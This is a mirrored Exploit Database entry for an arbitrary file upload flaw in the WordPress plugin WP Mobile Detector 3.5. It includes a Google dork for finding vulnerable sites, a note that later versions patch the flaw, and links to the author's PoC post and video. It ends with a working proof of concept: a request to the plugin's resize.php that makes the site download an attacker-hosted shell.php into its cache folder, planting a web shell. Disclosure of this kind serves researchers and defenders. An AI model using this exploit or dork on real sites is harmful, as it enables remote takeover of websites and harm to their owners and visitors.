WordPress Plugin WP Mobile Detector 3.5 – Arbitrary File Upload

• Exploit Database
• 112 阅读

• 作者： Aaditya Purani
  日期： 2016-06-06
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/39891/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33

  #Exploit Title: WP Mobile Detector <=3.5 Arbitrary File upload #Google Dork: inurl: /wp-includes/plugins/wp-mobile-detector #Date: 1-06-2015 #Exploit Author: Aaditya Purani #Author Details: https://aadityapurani.com #Vendor: https://wordpress.org/plugins/wp-mobile-detector/changelog #Version: 3.5 #Tested on: Kali Linux 2.0 Sana / Windows 10     This Vulnerable has been disclosed to public yesterday about WP Mobile Detector Arbitrary File upload for version <=3.5 in which attacker can upload malicious PHP Files (Shell) into the Website. Over 10,000 users are affected, Vendor has released a Patch in their version 3.6 & 3.7 at https://wordpress.org/plugins/wp-mobile-detector/changelog/ .   I have wrote a Complete POC post:   <blockquote class="wp-embedded-content" data-secret="5443tf4U8R"><a href="https://aadityapurani.com/2016/06/03/mobile-detector-poc/" target="_blank"rel="external nofollow" class="external" >WP Mobile Detector Vulnerability <= 3.5 Exploit POC</a></blockquote><iframe class="wp-embedded-content" sandbox="allow-scripts" security="restricted" style="position: absolute; visibility: hidden;" title="“WP Mobile Detector Vulnerability <= 3.5 Exploit POC” — Aaditya Purani - Hacker" src="https://aadityapurani.com/2016/06/03/mobile-detector-poc/embed/#?secret=zFFZ5AC31E#?secret=5443tf4U8R" data-secret="5443tf4U8R" frameborder="0" marginmarginscrolling="no"></iframe>   I have made a POC Video Here: https://www.youtube.com/watch?v=ULE1AVWfHTU   Simple POC:   Go to:   [wordpress sitempath].com/wp-content/plugins/wp-mobile-detector/resize.php?src=[link to your shell.php]   and it will get saved in directory:   /wp-content/plugins/wp-mobile-detector/cache/shell.php